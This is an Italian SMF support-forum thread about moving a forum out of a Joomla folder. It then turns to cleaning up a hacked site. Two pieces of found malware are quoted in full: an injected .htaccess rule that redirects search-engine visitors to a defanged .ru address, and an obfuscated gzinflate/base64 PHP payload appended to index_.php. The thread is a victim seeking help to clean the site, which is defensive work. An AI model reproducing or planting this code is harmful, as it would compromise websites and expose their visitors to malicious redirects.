News:

Wondering if this will always be free?  See why free is better.

Main Menu

Migrazione sito..

Started by Gabriele77, May 21, 2012, 08:38:36 AM

Previous topic - Next topic

emanuele

Se non erro hai spostato la directory del forum da /joomla/forum a /forum/.
Hai usato repair_settings.php per correggere i percorsi?


Take a peek at what I'm doing! ;D




Hai bisogno di supporto in Italiano?

Aiutateci ad aiutarvi: spiegate bene il vostro problema: no, "non funziona" non è una spiegazione!!
1) Cosa fai,
2) cosa ti aspetti,
3) cosa ottieni.

Gabriele77

allora...

al momento,sotto joomla,ho la cartella forum,attivo e funzionante e ora ci sono persone che ci stanno scrivendo dentro...
fuori,sotto la root,c'e' la cartella 'forum' che contiene i file di upgrade,che hanno sovrascritto una copia del forum vecchio..

www.motobauscia.com\forum\upgrade da quell'errore...
http://www.motobauscia.com/joomla/forum/ invece funziona...

l'idea era di testare tutto...e poi copiare la cartella per rendere tutto indolore...
mi viene in mente una cosa...ma se io installassi al posto dell'upgrade la full?
la installo,faccio le modifiche...e poi importo db e post...e' una follia o potrebbe funzionare?

al momento nn partendo nulla,non ho fatto nulla  ;D

emanuele

Quote from: Gabriele77 on May 22, 2012, 09:19:09 AM
mi viene in mente una cosa...ma se io installassi al posto dell'upgrade la full?
la installo,faccio le modifiche...e poi importo db e post...e' una follia o potrebbe funzionare?
Sì.
Perché tra la RC3 e la finale ci possono (al momento onestamente non mi ricordo se ci sono effettivamente) dei cambi al db e quindi l'import potrebbe causare casini.

Puoi mettere la directory /forum accessibile così che posso vedere? (al momento mi restituisce un "forbidden you don't have accesss")


Take a peek at what I'm doing! ;D




Hai bisogno di supporto in Italiano?

Aiutateci ad aiutarvi: spiegate bene il vostro problema: no, "non funziona" non è una spiegazione!!
1) Cosa fai,
2) cosa ti aspetti,
3) cosa ottieni.

Gabriele77

se usi facebook...ti aggiiungo...cosi possiamo scriverci da li...
birra offerta chiaro  ;D

--> http://www.facebook.com/gabriele.bresciani.5

emanuele

* emanuele non ha facebook...


Take a peek at what I'm doing! ;D




Hai bisogno di supporto in Italiano?

Aiutateci ad aiutarvi: spiegate bene il vostro problema: no, "non funziona" non è una spiegazione!!
1) Cosa fai,
2) cosa ti aspetti,
3) cosa ottieni.

Gabriele77

Quote from: emanuele on May 22, 2012, 09:56:30 AM
* emanuele non ha facebook...

ok...
sto spostando file nella cartella forum nella root e ricomincio..


emanuele

Quando hai i file su, usa repair_settings: http://download.simplemachines.org/?tools
e correggi i percorsi con i nuovi.

Poi fai l'upgrade!


Take a peek at what I'm doing! ;D




Hai bisogno di supporto in Italiano?

Aiutateci ad aiutarvi: spiegate bene il vostro problema: no, "non funziona" non è una spiegazione!!
1) Cosa fai,
2) cosa ti aspetti,
3) cosa ottieni.

Gabriele77

Quote from: emanuele on May 22, 2012, 10:07:37 AM
Quando hai i file su, usa repair_settings: http://download.simplemachines.org/?tools
e correggi i percorsi con i nuovi.

Poi fai l'upgrade!

la mia ignoranza domina...
ho scaricato il tool,come lo installo/uso?

emanuele

Lo carichi nella nuova directory edl forum, quindi col browser vai a:
http://www.motobauscia.com/forum/repair_settings.php
e controlli la sezione "percorsi".


Take a peek at what I'm doing! ;D




Hai bisogno di supporto in Italiano?

Aiutateci ad aiutarvi: spiegate bene il vostro problema: no, "non funziona" non è una spiegazione!!
1) Cosa fai,
2) cosa ti aspetti,
3) cosa ottieni.

Gabriele77

si lavora e si fatica...per il pane...e per..  8)

stasera ci si diverte  ;D ;D ;D

Gabriele77

#30
Buongiorno!
grazie all'aiuto di emanuele ci siamo quasi...
giochicchio un po' coi template in attesa della conclusione...

sei un grande  ;D

ore 10.12...

Quotegiochicchio un po' coi template in attesa della conclusione...

uguale distruggere  :( :( :(

emanuele

* emanuele si sveglia relativamente tardi... :P

148330 file mancanti...


Take a peek at what I'm doing! ;D




Hai bisogno di supporto in Italiano?

Aiutateci ad aiutarvi: spiegate bene il vostro problema: no, "non funziona" non è una spiegazione!!
1) Cosa fai,
2) cosa ti aspetti,
3) cosa ottieni.

emanuele

Quote from: Gabriele77 on May 23, 2012, 04:21:08 AM
ho messo un template...e ora nn va piu nulla

non riesco piu ad entrare come admin per cambiarlo...  :( :( :(
Un admin che deve cambiare il proprio tema perché quello in uso non funziona ha sempre un arma:
http://www.motobauscia.com/forum/index.php?theme=1
;D


Take a peek at what I'm doing! ;D




Hai bisogno di supporto in Italiano?

Aiutateci ad aiutarvi: spiegate bene il vostro problema: no, "non funziona" non è una spiegazione!!
1) Cosa fai,
2) cosa ti aspetti,
3) cosa ottieni.

Gabriele77

ahaah! mo ci giochicchio!
grazie grazie  ;D


fammi sapere che posso fare di altro ..
togliamo joomla?  8)

Gabriele77

#34
Buongiorno!
forse ho capito il problema!!

Se si apre il sito,si viene re-indirizzati qui ---> hxxp://rolyjyl.ru/count30.php
[Non apritelo...]

andando a controllare qui --> http://sucuri.net/global ,viene indicato come sito malevolo..
e associato all'htaccess...
nella mia ignoranza,me lo sono portato in locale e l'ho aperto con notepad...

e questo e' quello che leggo...
nn mi sembra corretto...sbaglio?

Quote
#d93065#
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|galaxy|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
RewriteRule ^(.*)$ hxxp://rolyjyl.ru/count30.php [R=301,L]
</IfModule>
#/d93065#

ora provo a rinominarlo old...e vedere che succede...
che ne pensate?

il sito e' aposto per il resto...e' stato brasato cacchio...
ema ema...grazie ancora  ;D

Edit by emanuele: meglio togliere qualche pezzo all'url se non deve essere aperta. ;)

Gabriele77

brasato l'htacces...
ma serve a qualcosa quel file?  :-X

Gabriele77

non so piu che fare...
qui me lo a ok...  :( :( :(


emanuele

Beh, ovviamente un htaccess del genere è da rimuovere immediatamente.
Ecco perché è bene spiegare *bene* il problema in tutti i dettagli possibili...

Allora, adesso c'è ancora qualche problema con i virus?


Take a peek at what I'm doing! ;D




Hai bisogno di supporto in Italiano?

Aiutateci ad aiutarvi: spiegate bene il vostro problema: no, "non funziona" non è una spiegazione!!
1) Cosa fai,
2) cosa ti aspetti,
3) cosa ottieni.

Gabriele77

Quote from: emanuele on May 24, 2012, 08:24:25 AM
Beh, ovviamente un htaccess del genere è da rimuovere immediatamente.
Ecco perché è bene spiegare *bene* il problema in tutti i dettagli possibili...

Allora, adesso c'è ancora qualche problema con i virus?

adesso siamo ad una media del 90% di gente che entra...
stavo cercando di modificare la scritta 'media' in 'gallery'....
giochicchiando un po' mi sono imbattuto nell'ftp e in 3 file index.php....
nn so se sia corretta come cosa...ho provato ad aprirli in locale...e ho trovato nel terzo una stringa strana finale..



index_.php

Quote
#d93065#
echo(gzinflate(base64_decode("3VZtb5swEP4rnYUEFCXFNoZmlPVDtF+wj1E+5IUM1DQkQBc1Uf/7zmebkLRJaTVp06JAzHF3z3Pnu4uvrv6Pz101K/N1/a0un/ebZF7Mnh7TVd2flemkTr8vU/nkkCfixpv+ZL1OV/Nhli/nzsYjIHuZTepZ5my27j5Lej5lNyLe7RJ7Ynv20o4Xib0oYVnA9QjXMAOZB6/LoR2/IOQ2TdZlURf18zo17qZlOi3dvXS0+2X3q6dpVZcOZbxHGXO93S6uqmQ0lq6czL23i3lqfyUk3iZ1lldxmmxHi8aKSoNxvEoI7QtLXsFA3m4tyi0aWUFkCSYFIdyEkDdUiuSKgcRiPmg3ImFxikr6+URZBLDkviWkiA+sQCCYfAjVw8EC0GmI0JpCpMxQSOUqkGIGUNxIBLrSkZxGJIJTCJBIFLlk4YmlkFaQBB2Hoq6I8TM4XXIlQoWLpEQr1MBi0QWqEjTQptIFa1IRDDCz8OUQBWDIt76hANmTCTRBqKj7ikqgVFBZkWYNc8WXWUypcoThOvlchaHYRhjGoMWIUbUvRhleYgw6uobzeQsVqmh4o/lBXYQ6f0Hj1Uhok1mhthXRNVH8quhwvyEgFXLjR5hfZtR0jYaaE9OJFK3tU740S7l7iAvhqBfGirelKuxbuekq/2d3HpRocKlI2wJEV9R1GR7Hg7vRoR3eLHBhejRAPzgjWGTapMugMMWPiWqn8OLUaCbB+e5oZgKmCHSwvltjiZmqOHSf3FNx0oWhqQbTZ8rz4K+12lsxvWoM/yMd0R4cbzSGKswOiO/3zgHp3RbqjHrcZa0B0t1Fqx/ftf9M+bwejUdFdDzr/lDNnhuxXZA/9T/2T/znSx5Cz3HeYIIR91v1jcTwMHN7YYySkeOk7j2pCByWXI+siUeWeU3GDplYpDkwuW68KEonT8Ie61F5xXlPhNGXxI9zz3P3D0kuD2BV5f2oy3z1s78oi8dhBoc6OIg5PXqdXTvco9er0cMYnL1sQDVOnQ0s7270cfM3")));
#/d93065#

altro malware?


emanuele

Quote from: Gabriele77 on May 24, 2012, 08:59:26 AM
adesso siamo ad una media del 90% di gente che entra...
stavo cercando di modificare la scritta 'media' in 'gallery'....
Se non ricordo male Modifications.italian-utf8.php

Quote from: Gabriele77 on May 24, 2012, 08:59:26 AM
giochicchiando un po' mi sono imbattuto nell'ftp e in 3 file index.php....
nn so se sia corretta come cosa...ho provato ad aprirli in locale...e ho trovato nel terzo una stringa strana finale..
[...]
altro malware?
I primi due sono corretti, il terzo, sì è un altro malware.


Take a peek at what I'm doing! ;D




Hai bisogno di supporto in Italiano?

Aiutateci ad aiutarvi: spiegate bene il vostro problema: no, "non funziona" non è una spiegazione!!
1) Cosa fai,
2) cosa ti aspetti,
3) cosa ottieni.

Advertisement: